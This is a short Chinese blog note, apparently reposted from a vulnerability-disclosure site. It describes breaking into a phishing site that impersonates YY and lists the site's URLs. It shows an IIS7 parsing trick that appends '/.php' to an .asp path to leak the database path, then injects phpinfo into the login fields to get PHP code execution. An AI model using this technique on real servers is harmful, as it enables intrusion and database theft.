一个钓鱼站爆裤小记
在乌云上看到的
目标为YY钓鱼地址是:http://226729.137167.20la.com.cn/
判断数据库连接地址为http://226729.137167.20la.com.cn/config.asp
然后用IIS7解析漏洞
http://226729.137167.20la.com.cn/config.asp/.php
爆出了数据库路径
在登录账户和密码处插个phpinfo,然后连接http://226729.137167.20la.com.cn/PoYser%2fdatas%2f%23%23Admin%23.asp%23/.php 成功执行php代码。
浙公网安备 33010602011771号